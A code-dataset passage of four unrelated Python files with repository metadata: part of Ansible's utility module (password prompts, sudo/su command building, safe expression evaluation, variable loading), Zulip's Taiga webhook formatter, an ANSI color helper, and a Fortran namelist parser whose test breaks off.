# Argument is a YAML file (JSON is a subset of YAML)
extra_vars = combine_vars(extra_vars, parse_yaml_from_file(extra_vars_opt[1:], vault_password=vault_pass))
elif extra_vars_opt and extra_vars_opt[0] in u'[{':
# Arguments as YAML
extra_vars = combine_vars(extra_vars, parse_yaml(extra_vars_opt))
else:
# Arguments as Key-value
extra_vars = combine_vars(extra_vars, parse_kv(extra_vars_opt))
return extra_vars
def ask_vault_passwords(ask_vault_pass=False, ask_new_vault_pass=False, confirm_vault=False, confirm_new=False):
vault_pass = None
new_vault_pass = None
if ask_vault_pass:
vault_pass = getpass.getpass(prompt="Vault password: ")
if ask_vault_pass and confirm_vault:
vault_pass2 = getpass.getpass(prompt="Confirm Vault password: ")
if vault_pass != vault_pass2:
raise errors.AnsibleError("Passwords do not match")
if ask_new_vault_pass:
new_vault_pass = getpass.getpass(prompt="New Vault password: ")
if ask_new_vault_pass and confirm_new:
new_vault_pass2 = getpass.getpass(prompt="Confirm New Vault password: ")
if new_vault_pass != new_vault_pass2:
raise errors.AnsibleError("Passwords do not match")
# enforce no newline chars at the end of passwords
if vault_pass:
vault_pass = to_bytes(vault_pass, errors='strict', nonstring='simplerepr').strip()
if new_vault_pass:
new_vault_pass = to_bytes(new_vault_pass, errors='strict', nonstring='simplerepr').strip()
return vault_pass, new_vault_pass
def ask_passwords(ask_pass=False, become_ask_pass=False, ask_vault_pass=False, become_method=C.DEFAULT_BECOME_METHOD):
sshpass = None
becomepass = None
vaultpass = None
become_prompt = ''
if ask_pass:
sshpass = getpass.getpass(prompt="SSH password: ")
become_prompt = "%s password[defaults to SSH password]: " % become_method.upper()
if sshpass:
sshpass = to_bytes(sshpass, errors='strict', nonstring='simplerepr')
else:
become_prompt = "%s password: " % become_method.upper()
if become_ask_pass:
becomepass = getpass.getpass(prompt=become_prompt)
if ask_pass and becomepass == '':
becomepass = sshpass
if becomepass:
becomepass = to_bytes(becomepass)
if ask_vault_pass:
vaultpass = getpass.getpass(prompt="Vault password: ")
if vaultpass:
vaultpass = to_bytes(vaultpass, errors='strict', nonstring='simplerepr').strip()
return (sshpass, becomepass, vaultpass)
def choose_pass_prompt(options):
if options.ask_su_pass:
return 'su'
elif options.ask_sudo_pass:
return 'sudo'
return options.become_method
def normalize_become_options(options):
options.become_ask_pass = options.become_ask_pass or options.ask_sudo_pass or options.ask_su_pass or C.DEFAULT_BECOME_ASK_PASS
options.become_user = options.become_user or options.sudo_user or options.su_user or C.DEFAULT_BECOME_USER
if options.become:
pass
elif options.sudo:
options.become = True
options.become_method = 'sudo'
elif options.su:
options.become = True
options.become_method = 'su'
def do_encrypt(result, encrypt, salt_size=None, salt=None):
if PASSLIB_AVAILABLE:
try:
crypt = getattr(passlib.hash, encrypt)
except:
raise errors.AnsibleError("passlib does not support '%s' algorithm" % encrypt)
if salt_size:
result = crypt.encrypt(result, salt_size=salt_size)
elif salt:
result = crypt.encrypt(result, salt=salt)
else:
result = crypt.encrypt(result)
else:
raise errors.AnsibleError("passlib must be installed to encrypt vars_prompt values")
return result
def last_non_blank_line(buf):
all_lines = buf.splitlines()
all_lines.reverse()
for line in all_lines:
if (len(line) > 0):
return line
# shouldn't occur unless there's no output
return ""
def filter_leading_non_json_lines(buf):
'''
used to avoid random output from SSH at the top of JSON output, like messages from
tcagetattr, or where dropbear spews MOTD on every single command (which is nuts).
need to filter anything which starts not with '{', '[', ', '=' or is an empty line.
filter only leading lines since multiline JSON is valid.
'''
filtered_lines = StringIO.StringIO()
stop_filtering = False
for line in buf.splitlines():
if stop_filtering or line.startswith('{') or line.startswith('['):
stop_filtering = True
filtered_lines.write(line + '\n')
return filtered_lines.getvalue()
def boolean(value):
val = str(value)
if val.lower() in [ "true", "t", "y", "1", "yes" ]:
return True
else:
return False
def make_become_cmd(cmd, user, shell, method, flags=None, exe=None):
"""
helper function for connection plugins to create privilege escalation commands
"""
randbits = ''.join(chr(random.randint(ord('a'), ord('z'))) for x in xrange(32))
success_key = 'BECOME-SUCCESS-%s' % randbits
prompt = None
becomecmd = None
shell = shell or '$SHELL'
if method == 'sudo':
# Rather than detect if sudo wants a password this time, -k makes sudo always ask for
# a password if one is required. Passing a quoted compound command to sudo (or sudo -s)
# directly doesn't work, so we shellquote it with pipes.quote() and pass the quoted
# string to the user's shell. We loop reading output until we see the randomly-generated
# sudo prompt set with the -p option.
prompt = '[sudo via ansible, key=%s] password: ' % randbits
exe = exe or C.DEFAULT_SUDO_EXE
becomecmd = '%s -k && %s %s -S -p "%s" -u %s %s -c %s' % \
(exe, exe, flags or C.DEFAULT_SUDO_FLAGS, prompt, user, shell, pipes.quote('echo %s; %s' % (success_key, cmd)))
elif method == 'su':
exe = exe or C.DEFAULT_SU_EXE
flags = flags or C.DEFAULT_SU_FLAGS
becomecmd = '%s %s %s -c "%s -c %s"' % (exe, flags, user, shell, pipes.quote('echo %s; %s' % (success_key, cmd)))
elif method == 'pbrun':
prompt = 'assword:'
exe = exe or 'pbrun'
flags = flags or ''
becomecmd = '%s -b -l %s -u %s "%s"' % (exe, flags, user, pipes.quote('echo %s; %s' % (success_key,cmd)))
elif method == 'pfexec':
exe = exe or 'pfexec'
flags = flags or ''
# No user as it uses it's own exec_attr to figure it out
becomecmd = '%s %s "%s"' % (exe, flags, pipes.quote('echo %s; %s' % (success_key,cmd)))
if becomecmd is None:
raise errors.AnsibleError("Privilege escalation method not found: %s" % method)
return (('%s -c ' % shell) + pipes.quote(becomecmd), prompt, success_key)
def make_sudo_cmd(sudo_exe, sudo_user, executable, cmd):
"""
helper function for connection plugins to create sudo commands
"""
return make_become_cmd(cmd, sudo_user, executable, 'sudo', C.DEFAULT_SUDO_FLAGS, sudo_exe)
def make_su_cmd(su_user, executable, cmd):
"""
Helper function for connection plugins to create direct su commands
"""
return make_become_cmd(cmd, su_user, executable, 'su', C.DEFAULT_SU_FLAGS, C.DEFAULT_SU_EXE)
def get_diff(diff):
# called by --diff usage in playbook and runner via callbacks
# include names in diffs 'before' and 'after' and do diff -U 10
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
ret = []
if 'dst_binary' in diff:
ret.append("diff skipped: destination file appears to be binary\n")
if 'src_binary' in diff:
ret.append("diff skipped: source file appears to be binary\n")
if 'dst_larger' in diff:
ret.append("diff skipped: destination file size is greater than %d\n" % diff['dst_larger'])
if 'src_larger' in diff:
ret.append("diff skipped: source file size is greater than %d\n" % diff['src_larger'])
if 'before' in diff and 'after' in diff:
if 'before_header' in diff:
before_header = "before: %s" % diff['before_header']
else:
before_header = 'before'
if 'after_header' in diff:
after_header = "after: %s" % diff['after_header']
else:
after_header = 'after'
differ = difflib.unified_diff(to_unicode(diff['before']).splitlines(True), to_unicode(diff['after']).splitlines(True), before_header, after_header, '', '', 10)
for line in list(differ):
ret.append(line)
return u"".join(ret)
except UnicodeDecodeError:
return ">> the files are different, but the diff library cannot compare unicode strings"
def is_list_of_strings(items):
for x in items:
if not isinstance(x, basestring):
return False
return True
def list_union(a, b):
result = []
for x in a:
if x not in result:
result.append(x)
for x in b:
if x not in result:
result.append(x)
return result
def list_intersection(a, b):
result = []
for x in a:
if x in b and x not in result:
result.append(x)
return result
def list_difference(a, b):
result = []
for x in a:
if x not in b and x not in result:
result.append(x)
for x in b:
if x not in a and x not in result:
result.append(x)
return result
def contains_vars(data):
'''
returns True if the data contains a variable pattern
'''
return "$" in data or "{{" in data
def safe_eval(expr, locals={}, include_exceptions=False):
'''
This is intended for allowing things like:
with_items: a_list_variable
Where Jinja2 would return a string but we do not want to allow it to
call functions (outside of Jinja2, where the env is constrained). If
the input data to this function came from an untrusted (remote) source,
it should first be run through _clean_data_struct() to ensure the data
is further sanitized prior to evaluation.
Based on:
http://stackoverflow.com/questions/12523516/using-ast-and-whitelists-to-make-pythons-eval-safe
'''
# this is the whitelist of AST nodes we are going to
# allow in the evaluation. Any node type other than
# those listed here will raise an exception in our custom
# visitor class defined below.
SAFE_NODES = set(
(
ast.Add,
ast.BinOp,
ast.Call,
ast.Compare,
ast.Dict,
ast.Div,
ast.Expression,
ast.List,
ast.Load,
ast.Mult,
ast.Num,
ast.Name,
ast.Str,
ast.Sub,
ast.Tuple,
ast.UnaryOp,
)
)
# AST node types were expanded after 2.6
if not sys.version.startswith('2.6'):
SAFE_NODES.union(
set(
(ast.Set,)
)
)
filter_list = []
for filter in filter_loader.all():
filter_list.extend(filter.filters().keys())
CALL_WHITELIST = C.DEFAULT_CALLABLE_WHITELIST + filter_list
class CleansingNodeVisitor(ast.NodeVisitor):
def generic_visit(self, node, inside_call=False):
if type(node) not in SAFE_NODES:
raise Exception("invalid expression (%s)" % expr)
elif isinstance(node, ast.Call):
inside_call = True
elif isinstance(node, ast.Name) and inside_call:
if hasattr(builtin, node.id) and node.id not in CALL_WHITELIST:
raise Exception("invalid function: %s" % node.id)
# iterate over all child nodes
for child_node in ast.iter_child_nodes(node):
self.generic_visit(child_node, inside_call)
if not isinstance(expr, basestring):
# already templated to a datastructure, perhaps?
if include_exceptions:
return (expr, None)
return expr
cnv = CleansingNodeVisitor()
try:
parsed_tree = ast.parse(expr, mode='eval')
cnv.visit(parsed_tree)
compiled = compile(parsed_tree, expr, 'eval')
result = eval(compiled, {}, locals)
if include_exceptions:
return (result, None)
else:
return result
except SyntaxError, e:
# special handling for syntax errors, we just return
# the expression string back as-is
if include_exceptions:
return (expr, None)
return expr
except Exception, e:
if include_exceptions:
return (expr, e)
return expr
def listify_lookup_plugin_terms(terms, basedir, inject):
from ansible.utils import template
if isinstance(terms, basestring):
# someone did:
# with_items: alist
# OR
# with_items: {{ alist }}
stripped = terms.strip()
if not (stripped.startswith('{') or stripped.startswith('[')) and \
not stripped.startswith("/") and \
not stripped.startswith('set([') and \
not LOOKUP_REGEX.search(terms):
# if not already a list, get ready to evaluate with Jinja2
# not sure why the "/" is in above code :)
try:
new_terms = template.template(basedir, "{{ %s }}" % terms, inject)
if isinstance(new_terms, basestring) and "{{" in new_terms:
pass
else:
terms = new_terms
except:
pass
if '{' in terms or '[' in terms:
# Jinja2 already evaluated a variable to a list.
# Jinja2-ified list needs to be converted back to a real type
# TODO: something a bit less heavy than eval
return safe_eval(terms)
if isinstance(terms, basestring):
terms = [ terms ]
return terms
def combine_vars(a, b):
_validate_both_dicts(a, b)
if C.DEFAULT_HASH_BEHAVIOUR == "merge":
return merge_hash(a, b)
else:
return dict(a.items() + b.items())
def random_password(length=20, chars=C.DEFAULT_PASSWORD_CHARS):
'''Return a random password string of length containing only chars.'''
password = []
while len(password) < length:
new_char = os.urandom(1)
if new_char in chars:
password.append(new_char)
return ''.join(password)
def before_comment(msg):
''' what's the part of a string before a comment? '''
msg = msg.replace("\#","**NOT_A_COMMENT**")
msg = msg.split("#")[0]
msg = msg.replace("**NOT_A_COMMENT**","#")
return msg
def load_vars(basepath, results, vault_password=None):
"""
Load variables from any potential yaml filename combinations of basepath,
returning result.
"""
paths_to_check = [ "".join([basepath, ext])
for ext in C.YAML_FILENAME_EXTENSIONS ]
found_paths = []
for path in paths_to_check:
found, results = _load_vars_from_path(path, results, vault_password=vault_password)
if found:
found_paths.append(path)
# disallow the potentially confusing situation that there are multiple
# variable files for the same name. For example if both group_vars/all.yml
# and group_vars/all.yaml
if len(found_paths) > 1:
raise errors.AnsibleError("Multiple variable files found. "
"There should only be one. %s" % ( found_paths, ))
return results
## load variables from yaml files/dirs
# e.g. host/group_vars
#
def _load_vars_from_path(path, results, vault_password=None):
"""
Robustly access the file at path and load variables, carefully reporting
errors in a friendly/informative way.
Return the tuple (found, new_results, )
"""
try:
# in the case of a symbolic link, we want the stat of the link itself,
# not its target
pathstat = os.lstat(path)
except os.error, err:
# most common case is that nothing exists at that path.
if err.errno == errno.ENOENT:
return False, results
# otherwise this is a condition we should report to the user
raise errors.AnsibleError(
"%s is not accessible: %s."
" Please check its permissions." % ( path, err.strerror))
# symbolic link
if stat.S_ISLNK(pathstat.st_mode):
try:
target = os.path.realpath(path)
except os.error, err2:
raise errors.AnsibleError("The symbolic link at %s "
"is not readable: %s. Please check its permissions."
% (path, err2.strerror, ))
# follow symbolic link chains by recursing, so we repeat the same
# permissions checks above and provide useful errors.
return _load_vars_from_path(target, results, vault_password)
# directory
if stat.S_ISDIR(pathstat.st_mode):
# support organizing variables across multiple files in a directory
return True, _load_vars_from_folder(path, results, vault_password=vault_password)
# regular file
elif stat.S_ISREG(pathstat.st_mode):
data = parse_yaml_from_file(path, vault_password=vault_password)
if data and type(data) != dict:
raise errors.AnsibleError(
"%s must be stored as a dictionary/hash" % path)
elif data is None:
data = {}
# combine vars overrides by default but can be configured to do a
# hash merge in settings
results = combine_vars(results, data)
return True, results
# something else? could be a fifo, socket, device, etc.
else:
raise errors.AnsibleError("Expected a variable file or directory "
"but found a non-file object at path %s" % (path, ))
def _load_vars_from_folder(folder_path, results, vault_password=None):
"""
Load all variables within a folder recursively.
"""
# this function and _load_vars_from_path are mutually recursive
try:
names = os.listdir(folder_path)
except os.error, err:
raise errors.AnsibleError(
"This folder cannot be listed: %s: %s."
% ( folder_path, err.strerror))
# evaluate files in a stable order rather than whatever order the
# filesystem lists them.
names.sort()
# do not parse hidden files or dirs, e.g. .svn/
paths = [os.path.join(folder_path, name) for name in names if not name.startswith('.')]
for path in paths:
_found, results = _load_vars_from_path(path, results, vault_password=vault_password)
return results
def update_hash(hash, key, new_value):
''' used to avoid nested .update calls on the parent '''
value = hash.get(key, {})
value.update(new_value)
hash[key] = value
def censor_unlogged_data(data):
'''
used when the no_log: True attribute is passed to a task to keep data from a callback.
NOT intended to prevent variable registration, but only things from showing up on
screen
'''
new_data = {}
for (x,y) in data.iteritems():
if x in [ 'skipped', 'changed', 'failed', 'rc' ]:
new_data[x] = y
new_data['censored'] = 'results hidden due to no_log parameter'
return new_data
def check_mutually_exclusive_privilege(options, parser):
# privilege escalation command line arguments need to be mutually exclusive
if (options.su or options.su_user or options.ask_su_pass) and \
(options.sudo or options.sudo_user or options.ask_sudo_pass) or \
(options.su or options.su_user or options.ask_su_pass) and \
(options.become or options.become_user or options.become_ask_pass) or \
(options.sudo or options.sudo_user or options.ask_sudo_pass) and \
(options.become or options.become_user or options.become_ask_pass):
parser.error("Sudo arguments ('--sudo', '--sudo-user', and '--ask-sudo-pass') "
"and su arguments ('-su', '--su-user', and '--ask-su-pass') "
"and become arguments ('--become', '--become-user', and '--ask-become-pass')"
" are exclusive of each other")
|
muravjov/ansible
|
lib/ansible/utils/__init__.py
|
Python
|
gpl-3.0
| 60,718
| 0.004957
|
"""
Taiga integration for Zulip.
Tips for notification output:
*Emojis*: most of the events have specific emojis e.g.
- :notebook: - change of subject/name/description
- :chart_with_upwards_trend: - change of status
etc. If no there's no meaningful emoji for certain event, the defaults are used:
- :thought_balloon: - event connected to commenting
- :busts_in_silhouette: - event connected to a certain user
- :package: - all other events connected to user story
- :calendar: - all other events connected to milestones
- :clipboard: - all other events connected to tasks
- :bulb: - all other events connected to issues
*Text formatting*: if there has been a change of a property, the new value should always be in bold; otherwise the
subject of US/task should be in bold.
"""
from __future__ import absolute_import
from typing import Any, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.http import HttpRequest, HttpResponse
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success, json_error
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile, Client
import ujson
from six.moves import range
@api_key_only_webhook_view('Taiga')
@has_request_variables
def api_taiga_webhook(request, user_profile, client, message=REQ(argument_type='body'),
stream=REQ(default='taiga'), topic=REQ(default='General')):
# type: (HttpRequest, UserProfile, Client, Dict[str, Any], Text, Text) -> HttpResponse
parsed_events = parse_message(message)
content_lines = []
for event in parsed_events:
content_lines.append(generate_content(event) + '\n')
content = "".join(sorted(content_lines))
check_send_message(user_profile, client, 'stream', [stream], topic, content)
return json_success()
templates = {
'userstory': {
'create': u':package: %(user)s created user story **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned user story **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned user story **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned user story **%(subject)s**'
' from %(old)s to %(new)s.',
'points': u':game_die: %(user)s changed estimation of user story **%(subject)s**.',
'blocked': u':lock: %(user)s blocked user story **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked user story **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added user story **%(subject)s** to sprint %(new)s.',
'unset_milestone': u':calendar: %(user)s removed user story **%(subject)s** from sprint %(old)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of user story **%(subject)s** from %(old)s'
' to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of user story **%(subject)s**'
' from %(old)s to %(new)s.',
'closed': u':checkered_flag: %(user)s closed user story **%(subject)s**.',
'reopened': u':package: %(user)s reopened user story **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed user story from %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of user story **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on user story **%(subject)s**.',
'delete': u':x: %(user)s deleted user story **%(subject)s**.'
},
'milestone': {
'create': u':calendar: %(user)s created sprint **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed sprint from %(old)s to **%(new)s**.',
'estimated_start': u':calendar: %(user)s changed estimated start of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'estimated_finish': u':calendar: %(user)s changed estimated finish of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'delete': u':x: %(user)s deleted sprint **%(subject)s**.'
},
'task': {
'create': u':clipboard: %(user)s created task **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned task **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned task **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned task **%(subject)s**'
' from %(old)s to %(new)s.',
'blocked': u':lock: %(user)s blocked task **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked task **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added task **%(subject)s** to sprint %(new)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of task **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of task **%(subject)s**'
' from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed task %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of task **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on task **%(subject)s**.',
'delete': u':x: %(user)s deleted task **%(subject)s**.',
'changed_us': u':clipboard: %(user)s moved task **%(subject)s** from user story %(old)s to %(new)s.'
},
'issue': {
'create': u':bulb: %(user)s created issue **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned issue **%(subject)s** to %(new)s.', #
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned issue **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_priority': u':rocket: %(user)s changed priority of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_severity': u':warning: %(user)s changed severity of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_type': u':bulb: %(user)s changed type of issue **%(subject)s** from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed issue %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of issue **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on issue **%(subject)s**.',
'delete': u':x: %(user)s deleted issue **%(subject)s**.'
},
}
def get_old_and_new_values(change_type, message):
# type: (str, Mapping[str, Any]) -> Tuple[Optional[Dict[str, Any]], Optional[Dict[str, Any]]]
""" Parses the payload and finds previous and current value of change_type."""
if change_type in ['subject', 'name', 'estimated_finish', 'estimated_start']:
old = message["change"]["diff"][change_type]["from"]
new = message["change"]["diff"][change_type]["to"]
return old, new
try:
old = message["change"]["diff"][change_type]["from"]
except KeyError:
old = None
try:
new = message["change"]["diff"][change_type]["to"]
except KeyError:
new = None
return old, new
def parse_comment(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses the comment to issue, task or US. """
return {
'event': 'commented',
'type': message["type"],
'values': {
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_create_or_delete(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses create or delete event. """
return {
'type': message["type"],
'event': message["action"],
'values':
{
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_change_event(change_type, message):
# type: (str, Mapping[str, Any]) -> Dict[str, Any]
""" Parses change event. """
evt = {} # type: Dict[str, Any]
values = {
'user': get_owner_name(message),
'subject': get_subject(message)
} # type: Dict[str, Any]
if change_type in ["description_diff", "points"]:
event_type = change_type
elif change_type in ["milestone", "assigned_to"]:
old, new = get_old_and_new_values(change_type, message)
if not old:
event_type = "set_" + change_type
values["new"] = new
elif not new:
event_type = "unset_" + change_type
values["old"] = old
else:
event_type = "changed_" + change_type
values.update({'old': old, 'new': new})
elif change_type == "is_blocked":
if message["change"]["diff"]["is_blocked"]["to"]:
event_type = "blocked"
else:
event_type = "unblocked"
elif change_type == "is_closed":
if message["change"]["diff"]["is_closed"]["to"]:
event_type = "closed"
else:
event_type = "reopened"
elif change_type == "user_story":
old, new = get_old_and_new_values(change_type, message)
event_type = "changed_us"
values.update({'old': old, 'new': new})
elif change_type in ["subject", 'name']:
event_type = 'renamed'
old, new = get_old_and_new_values(change_type, message)
values.update({'old': old, 'new': new})
elif change_type in ["estimated_finish", "estimated_start"]:
old, new = get_old_and_new_values(change_type, message)
if not old == new:
event_type = change_type
values.update({'old': old, 'new': new})
else:
# date hasn't changed
return None
elif change_type in ["priority", "severity", "type", "status"]:
event_type = 'changed_' + change_type
old, new = get_old_and_new_values(change_type, message)
values.update({'old': old, 'new': new})
else:
# we are not supporting this type of event
return None
evt.update({"type": message["type"], "event": event_type, "values": values})
return evt
def parse_message(message):
# type: (Mapping[str, Any]) -> List[Dict[str, Any]]
""" Parses the payload by delegating to specialized functions. """
events = []
if message["action"] in ['create', 'delete']:
events.append(parse_create_or_delete(message))
elif message["action"] == 'change':
if message["change"]["diff"]:
for value in message["change"]["diff"]:
parsed_event = parse_change_event(value, message)
if parsed_event:
events.append(parsed_event)
if message["change"]["comment"]:
events.append(parse_comment(message))
return events
def generate_content(data):
# type: (Mapping[str, Any]) -> str
""" Gets the template string and formats it with parsed data. """
try:
return templates[data['type']][data['event']] % data['values']
except KeyError:
return json_error(_("Unknown message"))
def get_owner_name(message):
# type: (Mapping[str, Any]) -> str
return message["by"]["full_name"]
def get_subject(message):
# type: (Mapping[str, Any]) -> str
data = message["data"]
return data.get("subject", data.get("name"))
|
Diptanshu8/zulip
|
zerver/views/webhooks/taiga.py
|
Python
|
apache-2.0
| 11,660
| 0.00446
|
from __future__ import absolute_import
from __future__ import unicode_literals
NAMES = [
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white'
]
def get_pairs():
for i, name in enumerate(NAMES):
yield(name, str(30 + i))
yield('intense_' + name, str(30 + i) + ';1')
def ansi(code):
return '\033[{0}m'.format(code)
def ansi_color(code, s):
return '{0}{1}{2}'.format(ansi(code), s, ansi(0))
def make_color_fn(code):
return lambda s: ansi_color(code, s)
for (name, code) in get_pairs():
globals()[name] = make_color_fn(code)
def rainbow():
cs = ['cyan', 'yellow', 'green', 'magenta', 'red', 'blue',
'intense_cyan', 'intense_yellow', 'intense_green',
'intense_magenta', 'intense_red', 'intense_blue']
for c in cs:
yield globals()[c]
|
rht/universe
|
universe/remotes/compose/colors.py
|
Python
|
mit
| 860
| 0
|
""" IO classes for Omnivor input file
Copyright (C) 2013 DTU Wind Energy
Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013
Namelist IO: badis functions to read and parse a fortran file into python dictonary and write it back to a file
The parser was adapted from: fortran-namelist on code.google with the following info:
__author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
__version__ = '$Revision: 1.0 $'[11:-2]
__date__ = '$Date: 2006/09/05 21:16:24 $'
__copyright__ = 'Copyright (c) 2006 RPN'
__license__ = 'LGPL'
Recognizes files of the form:
&namelistname
opt1 = value1
...
/
"""
from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest
import numpy as np
import os.path as path
import sys
import re
import tempfile
import os
__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
"""
Fortran Namelist IO class
Scan a Fortran Namelist file and put Section/Parameters into a dictionary
Write the file back if needed.
"""
def _write(self):
""" Write a file (overrided)
"""
with open(self.filename, 'w') as f:
for nml in self.data :
f.write('&'+nml+'\n')
# Sorting dictionary data (in the same order as it was created, thanks to id)
SortedList = sorted(self.data[nml].items(), key=lambda(k, v): v['id'])
# for param in self.data[nml]:
for param in map(lambda(k,v):k,SortedList):
f.write(param+'='+','.join(self.data[nml][param]['val']))
if len(self.data[nml][param]['com']) >0:
f.write(' !'+self.data[nml][param]['com'])
f.write('\n')
f.write('/\n')
def _read(self):
""" Read the file (overrided)
"""
with open(self.filename, 'r') as f:
data = f.read()
varname = r'\b[a-zA-Z][a-zA-Z0-9_]*\b'
valueInt = re.compile(r'[+-]?[0-9]+')
valueReal = re.compile(r'[+-]?([0-9]+\.[0-9]*|[0-9]*\.[0-9]+)')
valueNumber = re.compile(r'\b(([\+\-]?[0-9]+)?\.)?[0-9]*([eE][-+]?[0-9]+)?')
valueBool = re.compile(r"(\.(true|false|t|f)\.)",re.I)
valueTrue = re.compile(r"(\.(true|t)\.)",re.I)
spaces = r'[\s\t]*'
quote = re.compile(r"[\s\t]*[\'\"]")
namelistname = re.compile(r"^[\s\t]*&(" + varname + r")[\s\t]*$")
paramname = re.compile(r"[\s\t]*(" + varname+r')[\s\t]*=[\s\t]*')
namlistend = re.compile(r"^" + spaces + r"/" + spaces + r"$")
#split sections/namelists
mynmlfile = {}
mynmlfileRaw = {}
mynmlname = ''
for item in FortranNamelistIO.clean(data.split("\n"),cleancomma=1):
if re.match(namelistname,item):
mynmlname = re.sub(namelistname,r"\1",item)
mynmlfile[mynmlname] = {}
mynmlfileRaw[mynmlname] = []
elif re.match(namlistend,item):
mynmlname = ''
else:
if mynmlname:
mynmlfileRaw[mynmlname].append(item)
#parse param in each section/namelist
for mynmlname in mynmlfile.keys():
#split strings
bb = []
for item in mynmlfileRaw[mynmlname]:
if item[0]!='!':
# discarding lines that starts with a comment
bb.extend(FortranNamelistIO.splitstring(item))
#split comma and =
aa = []
for item in bb:
if not re.match(quote,item):
aa.extend(re.sub(r"[\s\t]*=",r" =\n",re.sub(r",+",r"\n",item)).split("\n"))
# aa.extend(re.sub(r"[\s\t]*=",r" =\n",item).split("\n"))
else:
aa.append(item)
del(bb)
aa = FortranNamelistIO.clean(aa,cleancomma=1)
myparname = ''
id_cum=0
for item in aa:
if re.search(paramname,item):
#myparname = re.sub(paramname,r"\1",item).lower() ! NO MORE LOWER CASE
myparname = re.sub(paramname,r"\1",item)
id_cum=id_cum+1
mynmlfile[mynmlname][myparname] = {
'val' : [],
'id' : id_cum,
'com' : ''
}
elif paramname:
# Storing comments
item2=item.split('!')
item=item2[0]
if len(item) > 1 :
mynmlfile[mynmlname][myparname]['com']=''.join(item2[1:])
if re.match(valueBool,item):
if re.match(valueTrue,item):
mynmlfile[mynmlname][myparname]['val'].append('.true.')
else:
mynmlfile[mynmlname][myparname]['val'].append('.false.')
else:
# item2=re.sub(r"(^[\'\"]|[\'\"]$)",r"",item.strip())
mynmlfile[mynmlname][myparname]['val'].append(item.strip())
self.data=mynmlfile
# Accessor and mutator dictionary style
def __getitem__(self, key):
""" Transform the class instance into a dictionary."""
return self.data[key]
def __setitem__(self, key, value):
""" Transform the class instance into a dictionary."""
self.data[key] = value
#==== Helper functions for Parsing of files
@staticmethod
def clean(mystringlist,commentexpr=r"^[\s\t]*\#.*$",spacemerge=0,cleancomma=0):
"""
Remove leading and trailing blanks, comments/empty lines from a list of strings
mystringlist = foo.clean(mystringlist,spacemerge=0,commentline=r"^[\s\t]*\#",cleancharlist="")
commentline: definition of commentline
spacemerge: if <>0, merge/collapse multi space
cleancomma: Remove leading and trailing commas
"""
aa = mystringlist
if cleancomma:
aa = [re.sub("(^([\s\t]*\,)+)|((\,[\s\t]*)+$)","",item).strip() for item in aa]
if commentexpr:
aa = [re.sub(commentexpr,"",item).strip() for item in aa]
if spacemerge:
aa = [re.sub("[\s\t]+"," ",item).strip() for item in aa if len(item.strip()) <> 0]
else:
aa = [item.strip() for item in aa if len(item.strip()) <> 0]
return aa
@staticmethod
def splitstring(mystr):
"""
Split a string in a list of strings at quote boundaries
Input: String
Output: list of strings
"""
dquote=r'(^[^\"\']*)(\"[^"]*\")(.*)$'
squote=r"(^[^\"\']*)(\'[^']*\')(.*$)"
mystrarr = re.sub(dquote,r"\1\n\2\n\3",re.sub(squote,r"\1\n\2\n\3",mystr)).split("\n")
#remove zerolenght items
mystrarr = [item for item in mystrarr if len(item) <> 0]
if len(mystrarr) > 1:
mystrarr2 = []
for item in mystrarr:
mystrarr2.extend(FortranNamelistIO.splitstring(item))
mystrarr = mystrarr2
return mystrarr
## Do Some testing -------------------------------------------------------
class TestFortranNamelist(TestWEFileIO):
""" Test class for MyFileType class """
test_file = './test/fortran/fortran_namelist.nml'
def test_output_identical(self):
InputFile=FortranNamelistIO(self.test_file)
test_fileout=tempfile.mkstemp()[1]
InputFile.write(test_fileout)
